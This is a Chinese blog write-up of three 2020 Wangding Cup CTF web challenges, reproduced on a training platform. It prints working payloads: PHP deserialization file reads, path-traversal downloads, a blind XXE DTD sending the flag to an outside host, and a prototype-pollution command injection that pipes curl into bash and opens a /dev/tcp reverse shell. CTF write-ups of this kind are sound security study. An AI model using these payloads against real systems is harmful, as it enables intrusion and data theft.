网鼑杯青龙组三道web题目复现

最新推荐文章于 2022-09-03 16:38:57 发布
最新推荐文章于 2022-09-03 16:38:57 发布
阅读量853 收藏 1
点赞数
分类专栏: ctf-wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43784056/article/details/106099498
版权

题目:AreUSerialz

打开题目就可以看到源码

<?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

}

这题主要是考察反序列化,只做出来了前半部分,用的相对路径,在本地是可以成功的,因为没有做限制,但是做题的时候是空白的,以为注释了,因为以前也遇到过,但是F12源码也看了,都没有,然后在这里就卡死了,但是这里复现的时候又可以看到,还是记录一下获得绝对路径的方法,下面是我的payload

O:11:"FileHandler":3:{S:5:"\00*\00op";i:2;S:11:"\00*\00filename";s:8:"flag.php";S:10:"\00*\00content";N;}

其实这个复现的环境就可以读到flag.php文件内容了

现在记录一下找网站的绝对路径的方法,当路径不是常规的/var/www,/var/www/html的时候

通过读取cmdline得到配置文件,再通过读配置文件去找绝对路径,但是这个复现环境结果不一样,所以没成功

O:11:%22FileHandler%22:3:{S:5:%22\00*\00op%22;i:2;S:11:%22\00*\00filename%22;s:18:%22/proc/self/cmdline%22;S:10:%22\00*\00content%22;N;}

题目:filejava

打开题目是个上传界面,上传个图片,得到个下载链接,这个url格式,想到任意文件下载

发现能够成功得到/etc/passwd文件

读取WEB-XML

/DownloadServlet?filename=../../../../../../../../../../../usr/local/tomcat/webapps/file_in_java/WEB-INF/web.xml

然后复现环境和题目环境是不一样的,所以路径不一样,这里写一下我找路径的方法,我是先包含了个目录,然后报500错误,得到信息

拿到Unicode在线网站解码一下

所以得到新的路径

 

../../../../../../../../../../../usr/local/tomcat/webapps/ROOT/WEB-INF/web.xml

成功得到文件内容

根据xml中的<servlet-class>把对应class都下载下来,然后反编译得到源码

下载文件的原理:https://www.runoob.com/servlet/servlet-packaging.html

../../../../../../../../../../../usr/local/tomcat/webapps/ROOT/WEB-INF/classes/cn/abc/servlet/DownloadServlet.class
../../../../../../../../../../../usr/local/tomcat/webapps/ROOT/WEB-INF/classes/cn/abc/servlet/ListFileServlet.class
../../../../../../../../../../../usr/local/tomcat/webapps/ROOT/WEB-INF/classes/cn/abc/servlet/ListFileServlet.class

然后在UploadServlet.java中发现关键代码

if ((filename.startsWith("excel-")) && ("xlsx".equals(fileExtName))) {
              try
              {
                Workbook wb1 = WorkbookFactory.create(in);
                Sheet sheet = wb1.getSheetAt(0);
                System.out.println(sheet.getFirstRowNum());
              }
              catch (InvalidFormatException e)
              {
                System.err.println("poi-ooxml-3.10 has something wrong");
                e.printStackTrace();
              }
            }

Excel的blind-xxe

现在本地新建一个xlsx文件,修改后缀名为zip,解压缩将[Content-Types].xml内容改成下面这个,然后重新压缩改成xlsx,文件名必须是excel-开头,xlsx文件名后缀,这是之前框起来的if语句

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE convert [ 
<!ENTITY % remote SYSTEM "http://174.1.74.32/chounana.dtd">
%remote;%int;%send;
]>

在公网服务器下面部署一个dtd文件,但是buuoj是内网,不能访问外网(这里卡了好久,然后搜索了一下,在buuoj的FAQ里面有提到),在buuoj上面开一个靶机作为服务器,然后部署一个chounana.dtd文件,内容如下

<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://174.1.74.32:2333?%file;'>">

 

服务器监听2333端口,命令

nc -lvvp 2333

上传文件,成功拿到flag

题目:notes

考点:CVE-2019-10795 undefsafe原型链污染

题目有个附件,给了源码

var express = require('express');
var path = require('path');
const undefsafe = require('undefsafe');
const { exec } = require('child_process');


var app = express();
class Notes {
    constructor() {
        this.owner = "whoknows";
        this.num = 0;
        this.note_list = {};
    }

    write_note(author, raw_note) {
        this.note_list[(this.num++).toString()] = {"author": author,"raw_note":raw_note};
    }

    get_note(id) {
        var r = {}
        undefsafe(r, id, undefsafe(this.note_list, id));
        return r;
    }

    edit_note(id, author, raw) {
        undefsafe(this.note_list, id + '.author', author);
        undefsafe(this.note_list, id + '.raw_note', raw);
    }

    get_all_notes() {
        return this.note_list;
    }

    remove_note(id) {
        delete this.note_list[id];
    }
}

var notes = new Notes();
notes.write_note("nobody", "this is nobody's first note");


app.set('views', path.join(__dirname, 'views'));
app.set('view engine', 'pug');

app.use(express.json());
app.use(express.urlencoded({ extended: false }));
app.use(express.static(path.join(__dirname, 'public')));


app.get('/', function(req, res, next) {
  res.render('index', { title: 'Notebook' });
});

app.route('/add_note')
    .get(function(req, res) {
        res.render('mess', {message: 'please use POST to add a note'});
    })
    .post(function(req, res) {
        let author = req.body.author;
        let raw = req.body.raw;
        if (author && raw) {
            notes.write_note(author, raw);
            res.render('mess', {message: "add note sucess"});
        } else {
            res.render('mess', {message: "did not add note"});
        }
    })

app.route('/edit_note')
    .get(function(req, res) {
        res.render('mess', {message: "please use POST to edit a note"});
    })
    .post(function(req, res) {
        let id = req.body.id;
        let author = req.body.author;
        let enote = req.body.raw;
        if (id && author && enote) {
            notes.edit_note(id, author, enote);
            res.render('mess', {message: "edit note sucess"});
        } else {
            res.render('mess', {message: "edit note failed"});
        }
    })

app.route('/delete_note')
    .get(function(req, res) {
        res.render('mess', {message: "please use POST to delete a note"});
    })
    .post(function(req, res) {
        let id = req.body.id;
        if (id) {
            notes.remove_note(id);
            res.render('mess', {message: "delete done"});
        } else {
            res.render('mess', {message: "delete failed"});
        }
    })

app.route('/notes')
    .get(function(req, res) {
        let q = req.query.q;
        let a_note;
        if (typeof(q) === "undefined") {
            a_note = notes.get_all_notes();
        } else {
            a_note = notes.get_note(q);
        }
        res.render('note', {list: a_note});
    })

app.route('/status')
    .get(function(req, res) {
        let commands = {
            "script-1": "uptime",
            "script-2": "free -m"
        };
        for (let index in commands) {
            exec(commands[index], {shell:'/bin/bash'}, (err, stdout, stderr) => {
                if (err) {
                    return;
                }
                console.log(`stdout: ${stdout}`);
            });
        }
        res.send('OK');
        res.end();
    })


app.use(function(req, res, next) {
  res.status(404).send('Sorry cant find that!');
});


app.use(function(err, req, res, next) {
  console.error(err.stack);
  res.status(500).send('Something broke!');
});


const port = 8080;
app.listen(port, () => console.log(`Example app listening at http://localhost:${port}`))

undefsafe的原型链污染参考:https://snyk.io/vuln/SNYK-JS-UNDEFSAFE-548940

来到edit_note后post提交如下payload:

id=__proto__.abc&author=curl%20http://174.1.74.32/shell.txt|bash&raw=a

shell.txt文件内容就是一个反弹shell命令

bash -i >& /dev/tcp/174.1.74.32/2333 0>&1

 然后访问/status,成功反弹shell,最后查看根目录下的flag

复现平台:https://buuoj.cn/

参考博客:https://www.gem-love.com/websecurity/2322.htm

0ne_
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网鼎杯2020青龙-web
ChenZIDu的博客
05-18 942
看来反序列化要多打点了,反序列化这块都不怎么熟~ AreUSerialz 源码 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "
[ CTF ]【天格】战队WriteUp- 2022年第三届“网鼎杯”网络安全大赛(青龙
ZXW_NUDT的博客
08-29 4556
[ CTF ]【天格】战队WriteUp- 2022年第三届“网鼎杯”网络安全大赛(青龙
CTF-网鼎杯往届题目
qq_37410729的博客
07-24 1742
记网鼎杯题目
网鼎杯-青龙-Web-Wp
XunanSec的博客
05-26 1190
0x01 开局一张图 一看就知道让我们代码审计 对于这种一长串的源码,还是逐步来解把 首先的解题思路就是查看CTF题目的命名和代码函数 CTF题目这里命名为AreUSerialz,我反正一眼看不出什么端详,打的CTF比较少,直接看函数名字 在下面可以看到有一个unserialize()函数,那这一题基本上就是考反序列化的知识了。 我们整体的浏览一边代码,来看一下程序的大概走向。 <?php include("flag.php"); highlight_file(__FILE__); cl
2020 网鼎杯web复现
fly夏天的博客
09-09 778
复现平台buuctf 白虎: PicDown 本题是任意文件下载 尝试下载/proc/self/comline 得到提示 python2 app.py (原题应该是main.py这里可能是复现环境的差异) 下载app.py,代码审计 from flask import Flask, Response from flask import render_template from flask import request import os import urllib app = Flask
2022年第三届“网鼎杯”网络安全大赛(青龙)部分题目附件
09-19
2022年第三届“网鼎杯”网络安全大赛(青龙)部分题目附件 2022年第三届“网鼎杯”网络安全大赛(青龙)部分题目附件 2022年第三届“网鼎杯”网络安全大赛(青龙)部分题目附件 2022年第三届“网鼎杯”网络...
网鼎杯青龙18道.rar
06-11
【标题】"网鼎杯青龙18道.rar"是一个关于网络安全竞赛的资源压缩包,其中包含了2020年网鼎杯青龙的比赛题目。网鼎杯是一项知名的网络安全技术竞赛,旨在提升参赛者的网络安全技能和实战能力,尤其针对青龙,...
2020网鼎杯青龙Boom
05-12
【标题】"2020网鼎杯青龙Boom" 涉及的是一个网络安全竞赛的场景,其中"网鼎杯"是中国国内知名的网络安全技术大赛,旨在提升参赛者的网络安全技能和应急处理能力。"青龙"可能是比赛中的一个分或者阶段,可能...
网鼎杯2022白虎题目分享
09-06
逆向,pwn,misc,加解密题目,网鼎杯2022,白虎,ctf
2020网鼎杯青龙白虎部分试题.rar
05-14
2020网鼎杯青龙白虎部分试题 ,包括密码、杂项、逆向、PWN。希望可以帮助到大家复习。此次青龙难度大于白虎。
undefsafe原型链&[网鼎杯 2020 青龙]notes
Je3Z的博客
08-25 574
感觉是考原型链但还是有点不知道如何下手,呜呜呜呜呜呜。 从浅入深 Javascript 原型链与原型链污染 [网鼎杯 2020 青龙]notes var express = require('express'); var path = require('path'); const undefsafe = require('undefsafe'); const { exec } = require('child_process'); var app = express(); class Notes {
[GYCTF2020]Ez_Express
snowlyzz的博客
09-03 624
JavaScript 原型链学习
2020网鼎杯青龙部分题目writeup
DreamHigh
05-16 931
2020网鼎杯青龙部分题目writeup0x00 Crypto之boom 0x00 Crypto之boom 下载下来是个exe文件,拖到cmd运行(切记一定不要双击,用cmd打开,双击运行后最后程序执行完后自动就关闭了,无法得到flag) 找个md5网站解密,得到明文(https://www.cmd5.com) 输入后得到一个方程,解方程,得x=74,y=68,z=31 输入又出现一个方程:x=89127561 解出来输入x可得flag(实际是3个题目答案的串联): 参考:https://bl
highlight_file函数漏洞
cnbird's blog
07-15 3022
 $file = /etc/passwd;highlight_file($file);?>利用../../../../../../../etc/passwd
i春秋网鼎杯网络安全大赛blend题目writeup
iqiqiya的博客
10-24 2161
下载后解压   发现只有1KB   what??? file 一下   说是main.bin: x86 boot sector 百度了一下下 说这个东西是linux的引导扇区 Boot sector是硬盘(严格来说是所有可引导的存储介质)上的第一个扇区,大小为512字节,这个扇区对于计算机启动来说至关重要。  主要分为三个部分,分别是:  MBR(master boot record...
2018网鼎杯MISC minified(write up)
re_psyche的博客
08-22 2810
题目链接:https://pan.baidu.com/s/1e2yPiiFVsg-NBpXJLEAc8A 密码:ksq9 首先用steg打开 我们不断向右查看,到red0时会发现是空白的。 猜测零通道问题,所以将alpha0,red0,green0,blue0,分别保存为bmp格式的图片 最后进行xor操作。经过一个一个的测试可以发现,对alpha0跟green0进行xor操作...
2020-网鼎杯-青龙-Web-AreUSerialz
feng的博客
11-03 758
前言 是一道PHP反序列胡的题目,不过那个ASCII的绕过就是我们知识盲区了,还有就是路径的问题,不过我是在CTFHub上做的这个题目,不存在路径的问题。 WP 首先进入环境,进行代码审计: <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; functio
关于oracle数据恢复
weixin_33915554的博客
10-30 70
imp hggj20170610/snsoft@121.46.30:1521/orcl1 file=D:\sndbbackup\hggj20170610back20180925224542.dmp full=y 直接在cmd中敲入可以恢复备份文件,hggj20170610/snsoft@121.46.30:1521/orcl1为指定恢复的数据库,file为备份文件地址 文件可以和需要恢复的数据...
允许外网访问青龙面板
最新发布
10-10
3. 配置登录验证:如果您希望对外网访问青龙面板进行登录验证,可以在 `config/auth.json` 文件中修改 `whitelist` 字段,添加允许访问的IP地址或IP段。 4. 重启青龙面板:保存配置文件后,重新启动青龙面板,使...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值